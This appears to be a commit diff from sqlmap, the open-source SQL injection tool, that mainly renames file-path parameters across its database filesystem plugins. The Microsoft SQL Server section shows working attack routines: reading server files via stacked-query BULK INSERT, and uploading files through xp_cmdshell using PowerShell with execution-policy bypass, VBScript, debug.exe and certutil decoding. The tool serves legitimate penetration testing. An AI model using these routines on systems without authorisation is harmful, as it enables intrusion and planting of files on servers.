Develop-Python
diff --git a/‎lib/controller/checks.py‎
Lines changed: 1 addition & 1 deletion b/‎lib/controller/checks.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎lib/core/settings.py‎
Lines changed: 1 addition & 1 deletion b/‎lib/core/settings.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎plugins/dbms/access/enumeration.py‎
Lines changed: 1 addition & 1 deletion b/‎plugins/dbms/access/enumeration.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎plugins/dbms/access/filesystem.py‎
Lines changed: 2 additions & 2 deletions b/‎plugins/dbms/access/filesystem.py‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎plugins/dbms/firebird/filesystem.py‎
Lines changed: 2 additions & 2 deletions b/‎plugins/dbms/firebird/filesystem.py‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎plugins/dbms/h2/filesystem.py‎
Lines changed: 2 additions & 2 deletions b/‎plugins/dbms/h2/filesystem.py‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎plugins/dbms/hsqldb/filesystem.py‎
Lines changed: 2 additions & 2 deletions b/‎plugins/dbms/hsqldb/filesystem.py‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎plugins/dbms/maxdb/filesystem.py‎
Lines changed: 2 additions & 2 deletions b/‎plugins/dbms/maxdb/filesystem.py‎
Lines changed: 2 additions & 2 deletions
diff --git a/‎plugins/dbms/mssqlserver/filesystem.py‎
Lines changed: 52 additions & 52 deletions b/‎plugins/dbms/mssqlserver/filesystem.py‎
Lines changed: 52 additions & 52 deletions
@@ -343,7 +343,7 @@ def checkSqlInjection(place, parameter, value):
                             msg += "only basic UNION tests if there is not "
                             msg += "at least one other (potential) "
                             msg += "technique found. Do you want to reduce "
-                            msg +="the number of requests? [Y/n] "
+                            msg += "the number of requests? [Y/n] "
                             kb.futileUnion = readInput(msg, default='Y', boolean=True)
 
                         if kb.futileUnion and int(_) > 10:
 
@@ -18,7 +18,7 @@
 from thirdparty.six import unichr as _unichr
 
 # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
-VERSION = "1.3.6.5"
+VERSION = "1.3.6.6"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
 
@@ -23,7 +23,7 @@ def getCurrentDb(self):
         warnMsg = "on Microsoft Access it is not possible to get name of the current database"
         logger.warn(warnMsg)
 
-    def isDba(self, *args, **kwargs):
+    def isDba(self, user=None):
         warnMsg = "on Microsoft Access it is not possible to test if current user is DBA"
         logger.warn(warnMsg)
 
 
@@ -9,10 +9,10 @@
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def readFile(self, rFile):
+    def readFile(self, remoteFile):
         errMsg = "on Microsoft Access it is not possible to read files"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         errMsg = "on Microsoft Access it is not possible to write files"
         raise SqlmapUnsupportedFeatureException(errMsg)
@@ -9,10 +9,10 @@
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def readFile(self, rFile):
+    def readFile(self, remoteFile):
         errMsg = "on Firebird it is not possible to read files"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         errMsg = "on Firebird it is not possible to write files"
         raise SqlmapUnsupportedFeatureException(errMsg)
@@ -9,10 +9,10 @@
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def readFile(self, rFile):
+    def readFile(self, remoteFile):
         errMsg = "on H2 it is not possible to read files"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         errMsg = "on H2 it is not possible to write files"
         raise SqlmapUnsupportedFeatureException(errMsg)
@@ -9,10 +9,10 @@
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def readFile(self, rFile):
+    def readFile(self, remoteFile):
         errMsg = "on HSQLDB it is not possible to read files"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         errMsg = "on HSQLDB it is not possible to write files"
         raise SqlmapUnsupportedFeatureException(errMsg)
@@ -9,10 +9,10 @@
 from plugins.generic.filesystem import Filesystem as GenericFilesystem
 
 class Filesystem(GenericFilesystem):
-    def readFile(self, rFile):
+    def readFile(self, remoteFile):
         errMsg = "on SAP MaxDB reading of files is not supported"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
+    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
         errMsg = "on SAP MaxDB writing of files is not supported"
         raise SqlmapUnsupportedFeatureException(errMsg)
@@ -81,8 +81,8 @@ def _updateDestChunk(self, fileContent, tmpPath):
 
         return chunkName
 
-    def stackedReadFile(self, rFile):
-        infoMsg = "fetching file: '%s'" % rFile
+    def stackedReadFile(self, remoteFile):
+        infoMsg = "fetching file: '%s'" % remoteFile
         logger.info(infoMsg)
 
         result = []
@@ -93,8 +93,8 @@ def stackedReadFile(self, rFile):
         inject.goStacked("DROP TABLE %s" % hexTbl)
         inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
 
-        logger.debug("loading the content of file '%s' into support table" % rFile)
-        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
+        logger.debug("loading the content of file '%s' into support table" % remoteFile)
+        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
 
         # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
         binToHexQuery = """DECLARE @charset VARCHAR(16)
@@ -147,7 +147,7 @@ def stackedReadFile(self, rFile):
 
             if not isNumPosStrValue(count):
                 errMsg = "unable to retrieve the content of the "
-                errMsg += "file '%s'" % rFile
+                errMsg += "file '%s'" % remoteFile
                 raise SqlmapNoneDataException(errMsg)
 
             indexRange = getLimitRange(count)
@@ -160,41 +160,41 @@ def stackedReadFile(self, rFile):
 
         return result
 
-    def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
+    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
         errMsg = "Microsoft SQL Server does not support file upload with "
         errMsg += "UNION query SQL injection technique"
         raise SqlmapUnsupportedFeatureException(errMsg)
 
-    def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
+    def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
         infoMsg = "using PowerShell to write the %s file content " % fileType
-        infoMsg += "to file '%s'" % dFile
+        infoMsg += "to file '%s'" % remoteFile
         logger.info(infoMsg)
 
-        encodedFileContent = encodeBase64(wFileContent, binary=False)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
         encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
         encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
 
         randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
         randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
 
-        wFileSize = len(encodedFileContent)
+        localFileSize = len(encodedFileContent)
         chunkMaxSize = 1024
 
         logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
 
-        for i in xrange(0, wFileSize, chunkMaxSize):
+        for i in xrange(0, localFileSize, chunkMaxSize):
             wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
             self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
 
         psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
         psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
         psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
-        psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
+        psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
 
         logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
         self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
 
-        logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
+        logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
 
         commands = (
             "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
@@ -204,27 +204,27 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+    def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
         infoMsg = "using debug.exe to write the %s " % fileType
-        infoMsg += "file content to file '%s', please wait.." % dFile
+        infoMsg += "file content to file '%s', please wait.." % remoteFile
         logger.info(infoMsg)
 
-        dFileName = ntpath.basename(dFile)
-        sFile = "%s\\%s" % (tmpPath, dFileName)
-        wFileSize = os.path.getsize(wFile)
+        remoteFileName = ntpath.basename(remoteFile)
+        sFile = "%s\\%s" % (tmpPath, remoteFileName)
+        localFileSize = os.path.getsize(localFile)
         debugSize = 0xFF00
 
-        if wFileSize < debugSize:
-            chunkName = self._updateDestChunk(wFileContent, tmpPath)
+        if localFileSize < debugSize:
+            chunkName = self._updateDestChunk(localFileContent, tmpPath)
 
             debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
-            debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile)
+            debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
             logger.debug(debugMsg)
 
             commands = (
                 "cd \"%s\"" % tmpPath,
-                "ren %s %s" % (chunkName, dFileName),
-                "move /Y %s %s" % (dFileName, dFile)
+                "ren %s %s" % (chunkName, remoteFileName),
+                "move /Y %s %s" % (remoteFileName, remoteFile)
             )
 
             self.execCmd(" & ".join(command for command in commands))
@@ -235,18 +235,18 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp
             debugMsg += "on the server, please wait.."
             logger.debug(debugMsg)
 
-            for i in xrange(0, wFileSize, debugSize):
-                wFileChunk = wFileContent[i:i + debugSize]
-                chunkName = self._updateDestChunk(wFileChunk, tmpPath)
+            for i in xrange(0, localFileSize, debugSize):
+                localFileChunk = localFileContent[i:i + debugSize]
+                chunkName = self._updateDestChunk(localFileChunk, tmpPath)
 
                 if i == 0:
                     debugMsg = "renaming chunk "
-                    copyCmd = "ren %s %s" % (chunkName, dFileName)
+                    copyCmd = "ren %s %s" % (chunkName, remoteFileName)
                 else:
                     debugMsg = "appending chunk "
-                    copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
+                    copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName)
 
-                debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
+                debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
                 logger.debug(debugMsg)
 
                 commands = (
@@ -257,18 +257,18 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp
 
                 self.execCmd(" & ".join(command for command in commands))
 
-            logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
+            logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
 
             commands = (
                 "cd \"%s\"" % tmpPath,
-                "move /Y %s %s" % (dFileName, dFile)
+                "move /Y %s %s" % (remoteFileName, remoteFile)
             )
 
             self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
+    def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
         infoMsg = "using a custom visual basic script to write the "
-        infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
+        infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
         logger.info(infoMsg)
 
         randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
@@ -327,10 +327,10 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
             Else
                 mimedecode = InStr(Base64Chars, strIn) - 1
             End If
-        End Function""" % (randFilePath, dFile)
+        End Function""" % (randFilePath, remoteFile)
 
         vbs = vbs.replace("    ", "")
-        encodedFileContent = encodeBase64(wFileContent, binary=False)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
 
         logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
 
@@ -349,35 +349,35 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
+    def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
         infoMsg = "using certutil.exe to write the %s " % fileType
-        infoMsg += "file content to file '%s', please wait.." % dFile
+        infoMsg += "file content to file '%s', please wait.." % remoteFile
         logger.info(infoMsg)
 
         chunkMaxSize = 500
 
         randFile = "tmpf%s.txt" % randomStr(lowercase=True)
         randFilePath = "%s\\%s" % (tmpPath, randFile)
 
-        encodedFileContent = encodeBase64(wFileContent, binary=False)
+        encodedFileContent = encodeBase64(localFileContent, binary=False)
 
         splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
 
         logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
 
         self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
 
-        logger.debug("decoding the file to %s.." % dFile)
+        logger.debug("decoding the file to %s.." % remoteFile)
 
         commands = (
             "cd \"%s\"" % tmpPath,
-            "certutil -f -decode %s %s" % (randFile, dFile),
+            "certutil -f -decode %s %s" % (randFile, remoteFile),
             "del /F /Q %s" % randFile
         )
 
         self.execCmd(" & ".join(command for command in commands))
 
-    def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
+    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
         # NOTE: this is needed here because we use xp_cmdshell extended
         # procedure to write a file on the back-end Microsoft SQL Server
         # file system
@@ -386,35 +386,35 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
         self.getRemoteTempPath()
 
         tmpPath = posixToNtSlashes(conf.tmpPath)
-        dFile = posixToNtSlashes(dFile)
-        with open(wFile, "rb") as f:
-            wFileContent = f.read()
+        remoteFile = posixToNtSlashes(remoteFile)
+        with open(localFile, "rb") as f:
+            localFileContent = f.read()
 
-        self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
-        written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+        self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
+        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the custom Visual Basic script technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the built-in debug.exe technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         if written is False:
             message = "do you want to try to upload the file with "
             message += "the built-in certutil.exe technique? [Y/n] "
 
             if readInput(message, default='Y', boolean=True):
-                self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
-                written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
+                self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
+                written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
 
         return written